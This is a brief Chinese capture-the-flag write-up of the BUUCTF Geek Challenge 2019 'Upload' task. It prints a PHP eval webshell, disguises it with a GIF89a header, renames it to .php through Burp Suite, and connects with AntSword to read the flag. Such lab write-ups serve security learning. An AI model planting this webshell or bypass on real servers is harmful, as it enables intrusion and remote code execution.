8.28 BUUCTF [极客大挑战 2019]Upload

利用文件上传一句话木马
打开靶机:
image
写一个 hack.txt

<script language='php'>eval($_POST['hack']);</script>

另存为 .jpg 上传 发现靶机会识别内容发现不是img
在语句前面加上 幻术文件头:

GIF89a
<script language='php'>eval($_POST['hack']);</script>

发现上传成功

再次上传并打开 burpsuite抓包 将后缀 修改为 .php 用repeater发送

访问 /upload/hack.php
可以发现上传的内容
image

打开中国蚁剑连接 密码为 hack
就可以访问
image

打开Linux虚拟终端
运行命令 cat /flag (cat flag 不行)
就可以得到 flag{}了
image

经验+1:https://buuoj.cn/challenges#[ACTF2020 新生赛]Upload

posted @ 2023-08-28 21:19  N0zoM1z0  阅读(24)  评论(0编辑  收藏  举报